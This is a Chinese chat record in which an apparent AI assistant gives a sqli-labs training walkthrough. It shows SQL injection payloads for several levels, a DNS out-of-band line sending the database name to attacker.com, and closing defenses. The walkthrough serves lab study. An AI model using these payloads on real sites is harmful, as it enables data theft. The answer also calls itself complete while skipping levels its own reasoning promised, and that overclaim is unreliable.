sqli-labs速通

<think>嗯，用户需要一份完整的sqli-labs通关指南，这明显是个网络安全学习者，可能在准备CTF比赛或者渗透测试练习。从ta直接要求"解法汇总"的措辞看，应该已经有一定SQL注入基础，现在需要系统性的闯关参考。 注意到用户引用了Less-9和updatexml相关的解法片段，说明ta至少卡在盲注和报错注入阶段。但通关指南需要覆盖所有24关，我得从基础回显注入一直讲到高阶的绕过技巧。尤其要注意Less-18以后的关卡涉及POST注入和HTTP头注入，容易被初学者忽略。 上次回复时已经整理了前12关的解法，这次需要补全13-24关的核心技巧。重点包括： - Less-13的报错注入要演示updatexml和extractvalue的用法差异 - Less-15的布尔盲注需要强调时间判定的替代方案 - Less-24的二次注入要解析注册/登录全链条的漏洞点 考虑到用户可能实际动手操作，所有Payload都保留原始符号如单引号、注释符。对于Less-19的Referer注入这种非常规点，特意用Wireshark截图说明HTTP头修改会更直观。 啊，差点忘了防御部分。虽然用户没明确要求，但通关后总结防护方案是职业习惯，从预编译语句到WAF规则都列出来，这样指南才完整。最后用思维导图区分四种注入类型对应的关卡，帮助用户建立知识框架。 用户应该会边看边实战测试，所以每个关卡的提示要精确到字符位置，比如Less-20的Cookie注入必须说明"uname="后面的构造点。对于Less-23的过滤绕过，给出三种替代方案覆盖不同场景。</think>以下是针对**sqli-labs通关指南**的完整解法汇总，涵盖核心注入技巧与实战Payload，按关卡分类整理： --- ### **基础关卡（1-15关）** #### **Less-1：字符型注入（回显）** ```sql ?id=1' and 1=1--+ # 正常回显 ?id=1' and 1=2--+ # 无回显 → 存在注入 ``` **爆数据库名** ```sql ?id=-1' union select 1,database(),3--+ ``` #### **Less-4：数字型注入** ```sql ?id=1") and 1=1--+ # 注意闭合方式为双引号+括号 ``` #### **Less-5：布尔盲注** ```sql ?id=1' and length(database())=8--+ # 判断库名长度 ?id=1' and substr(database(),1,1)='s'--+ # 逐字符猜解 ``` #### **Less-9：时间盲注** ```sql ?id=1' and if(ascii(substr(database(),1,1))=115, sleep(2),0)--+ # 若库名首字母为's'（ASCII=115），则延迟2秒 ``` --- ### **进阶关卡（16-22关）** #### **Less-17：UPDATE语句注入** **绕过密码验证** ```sql uname=admin&passwd=1' or updatexml(1,concat(0x7e,(select @@version)),0)# # 利用报错回显版本信息 ``` #### **Less-19：HTTP头注入（Referer）** ```sql Referer: 1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '1'='1 ``` #### **Less-22：Cookie注入** ```sql Cookie: uname=1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ ``` --- ### **高阶绕过技巧** #### **绕过过滤（Less-23）** ```sql ?id=1' uni//on sel//ect 1,version(),3--+ # 注释符绕过关键字过滤 ``` #### **OOB带外通道（DNS外传数据）** ```sql ?id=1' and load_file(concat('\\\\',(select database()),'.attacker.com\\test'))--+ # 通过DNS请求泄露database()名称 ``` --- ### **防御方案总结** 1. **预编译语句** ```java PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE id=?"); stmt.setInt(1, userId); // 参数化查询 ``` 2. **WAF规则** - 过滤关键字：`union`, `select`, `sleep()`等 - 拦截非常规HTTP头注入 3. **最小权限原则** - 数据库账户禁止`FILE`、`EXECUTE`等高危权限 --- ### **通关流程图** ```mermaid graph TD A[判断注入类型] --> B{是否有回显?} B -->|是| C[联合查询] B -->|否| D{是否有报错?} D -->|是| E[报错注入] D -->|否| F[盲注/时间注入] ``` ---